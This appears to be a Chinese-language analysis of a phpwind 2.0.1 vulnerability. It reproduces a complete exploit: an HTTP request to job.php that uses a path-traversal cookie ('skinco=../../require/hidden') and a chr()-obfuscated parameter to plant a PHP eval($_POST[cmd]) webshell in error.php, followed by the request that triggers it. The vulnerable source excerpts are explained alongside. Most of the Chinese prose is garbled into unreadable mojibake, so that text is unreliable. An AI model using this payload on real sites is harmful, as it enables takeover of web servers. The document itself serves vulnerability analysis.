分析phpwind2.0.1漏洞
ããç«ç«ä¼ ç»æä¸ä¸ªphpwind2.0.1æ¼æ´å©ç¨ç¨åºï¼å¯ä»¥ç´æ¥å¨ç®å½ä¸åå¥ä¸ä¸ªæ¨é©¬ãæä¹è¯´å¢ï¼è¿ä¸ªæ¼æ´æ¯pinkeyesåç°çï¼æ¬ææ¨å¨åæè¿ä¸ªæ¼æ´çæè·¯ãç´å°åç°è¿ä¸ªæ¼æ´æ¯æä¹äº§ççï¼æè¿å¨åèæ±ä¸ï¼åæ¶pinkeyes çç¿æºæ·±æ·±çæå¨äºæï¼åæ¥æææç½ä»ä¹ææ¯çæ£çææ¯å«éãä¸å¬ææ¢æ¢éæ¥ï¼
ããå¨ç¨åºè¿è¡æ¶ï¼ææäºä¸ä¸ªåï¼
ããGET /phpwind/job.php?previewjob=preview&D_name=./attachment/set.php&tidwt=
ãã(chr(46).chr(47).chr(101).chr(114).chr(114).chr(111).chr(114).chr(46).chr(112).chr(104).chr(112),w),
ããchr(60).chr(63).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).
ããchr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(59).chr(63).chr(62))?> HTTP/1.1
ããContent-Type: text/html
ããCookie:skinco=../../require/hidden;
ããHost: www.5a609.com:81
ããAccept: text/html, */*
ããUser-Agent: Mozilla/3.0 (compatible; Indy Library)
ããGET /phpwind//attachment/set.php HTTP/1.1
ããContent-Type: text/html
ããCookie:skinco=../../require/hidden;
ããHost: www.5a609.com:81
ããAccept: text/html, */*
ããUser-Agent: Mozilla/3.0 (compatible; Indy Library)
ããChr()éçé£äºä¸è¥¿ææ¥äºä¸ä¸asciiå符表ï¼å¾å°çæ¯è¿æ ·çï¼
ãã?>
ããå¾æ¾ç¶æ¯å¨error.phpéåå¥ä¸è¡phpæ¨é©¬ï¼ ã
ããæ以å³é®æ¯ï¼
ããGET /phpwind/job.php?previewjob=preview&D_name=./attachment/set.php&tidwt=ä¸$D_nameå$tidwtçåºå¤ãè¿ä¸¤ä¸ªä¸è¥¿å¾éè¦!äºæ¯æä¸äºä¸ä¸ªphpwind 2.0.1çç¨åºççï¼å¼å§ä»¥ä¸ºæ¯job.phpæé®é¢ãè¿å¥job.phpä¸ï¼åªåç°å¦ä¸ä»£ç ï¼
ããelseif($previewjob=='preview'){
ããrequire_once(R_P.'require/bbscode.php');
ããrequire_once(R_P.'header.php');
ããif (empty($skin)) $skin=$db_defaultstyle;
ããif (file_exists(R_P."data/style/$skin.php")){
ããinclude_once("data/style/$skin.php");
ãã}
ãã好ï¼å¨å¤±æçåæ¶ä¹åç°äº$skinä¸å®æé®é¢ï¼job.phpæ件头æ个ï¼require_once("./global.php");
ããæ¥çæ们æ¥ççglobal.phpéé¢ç$skinåæ°å§ï¼
ããif ($db_refreshtime!=0){
ããif('C:'.$REQUEST_URI==$lastpath && $onbbstime<$db_refreshtime){
ãã!$_COOKIE['winduid'] && $groupid='guest';
ãã$skin=$skinco ? $skinco : $db_defaultstyle;
ããShowmsg("refresh_limit");
ãã}
ããå¦ï¼åªè¦æ们å®ä¹äº$skincoå°±å¯ä»¥æ»¡è¶³$skinäº!æ以åæ¾æ¾$skincoå§ï¼$skincoåªæä¸å¤è§£éï¼å¶åï¼å¹¶æ²¡æåä»»ä½è¿æ»¤ï¼
ããif($skinco && file_exists(R_P."data/style/$skinco.php")){
ããCookie('skinco',$skinco);
ããååï¼å¥½è½»æ¾ï¼åªè¦åå¨å°±å¯ä»¥?è¿æ ·åªè¦æé ä¸ä¸ªcookieå°±å®å¨å¯ä»¥å®ç°ãå¦?$skincoæ们好象åªéè§è¿ãæç¶ï¼å°±æ¯ä¸é¢æçåéé¢çï¼
ããCookie:skinco=../../require/hidden;
ããè¿æ ·å°±æ´å è¯ææçæè·¯æ¯æ£ç¡®çï¼é£å路转åãåä¸å¾ä¸ä½©æè¿æ ·ç²¾å½©çææ³ï¼æç§pinkeyesçæè·¯ï¼æé ååºè¯¥æ¯è¿æ ·çï¼
ããdata/style/../../require/hidden.php
ããä¹å°±æ¯./require/hidden.phpã
ããè¿æ ·ä¹å°±æ¯æ»¡è¶³äºjob.phpä¸ç
ããif (file_exists(R_P."data/style/$skin.php")){
ããinclude_once("data/style/$skin.php");
ããå°è¿éï¼ååä¸æ®µè½ï¼æ们å个头æ³æ³ãæ们åæè¿ä¹å¤å°±æ¯pinkeyesè¦ä¸ºäºåå«ä¸ä¸ªæ件ï¼./require/hidden.phpãè¿å°±å¥æªäºï¼ä¸ºä»ä¹è¿ä¹pinkeyesè¦åæ¹ç¾è®¡çæ¥åå« ./require/hidden.phpå¢?ç´æ¥å©ç¨ä¸å¯ä»¥å?è¿ä¸ªhidden.phpå°åºæ¯ä¸ªä»ä¹æ ·çæ件å¢?æ©ï¼ä¸é¢ç解éä¼è®©ä½ æä¸ä¸ªæ»¡æççæ¡ã
ããæå°å¿ç¿¼ç¿¼çæå¼hidden.php
ãã
ãã!function_exists('readover') && exit('Forbidden');
ãã$newonline="<>t$timestampt$onlineipt$fidwtt$tidwtt$groupidt$wherebbsyout$acttimet$uidt$windidt";
ãã$newonline=str_pad($newonline,$db_olsize)."n";
ãã$onlineuser=readover(R_P.$D_name);
ããif($offset=strpos($onlineuser,"t".$windid."t")){
ãã$inselectfile='N';
ãã$offset=strpos($onlineuser,"n",$offset-$db_olsize);$offset+=1;/*ä¼ååä¸å¨å¼å§éè¦è½¬æ¢æé*/
ããwriteinline(R_P.$D_name,$newonline,$offset);
ãã}elseif($offset=strpos($onlineuser,str_pad(' ',$db_olsize)."n")){
ããwriteinline(R_P.$D_name,$newonline,$offset);
ãã}else{
ããwriteover(R_P.$D_name,$newonline,"ab");
ãã}
ãã?>
ããçå°è¿éï¼ææççå¢é½è§£å¼äº!
ãã1.åæ¥æ件头å¤äºä¸ª
ãã!function_exists('readover') && exit('Forbidden');
ããè¿æ ·ç´æ¥è®¿é®æ¯ä¸å许çï¼åé¢ç代ç ä¹ä¸ä¼æ§è¡ï¼è¿æ ·ææç½pinkeyesçè¦å¿å¤èµ°å¼¯è·¯æ¥åªåç¨includeæ¥åå«è¿ä¸ªæ件
ãã2 è¿ä¸ªæ件éæwriteline()æ¯å¯ä»¥åå¥æ¨é©¬çã$newonlineæ£å¥½ä¹å®ä¹äº$tidwtï¼æ以æåçwriteline()æ$tidwtä¹åè¿å»äºã
ããåå¥å°äºd_name æå®ä¹çset.phpè¿ä¸ªä¸´æ¶æ件éãæ¬æ¥è¿æ ·å°±å¯ä»¥åå¥ä¸ä¸ªå°æ¨é©¬äºï¼åªè¦ä½¿$tidwt为ç¼ç ï¼å°±å¯ä»¥çãä½æ¯å¯è½æ¯pinkeyesèèå°set.phpéçä¸è¥¿æ¯è¾ä¹±ãæ以çè´¹è¦å¿çç¨
ãã?>
ããåå¥ä¸ä¸ªæ´ç®åçæ¨é©¬å°error.phpé!è¿æ ·æå¤äºæ们æç第äºä¸ªåï¼
ããGET /phpwind//attachment/set.php HTTP/1.1
ããããããããããã
ããåè®°ï¼ææè§èªå·±å侦æ¢å°è¯´è¿ä¸éï¼ææ¯åï¼åãããã
ï¼æ¬æç±è´£ä»»ç¼è¾ pasu æ´çåå¸ï¼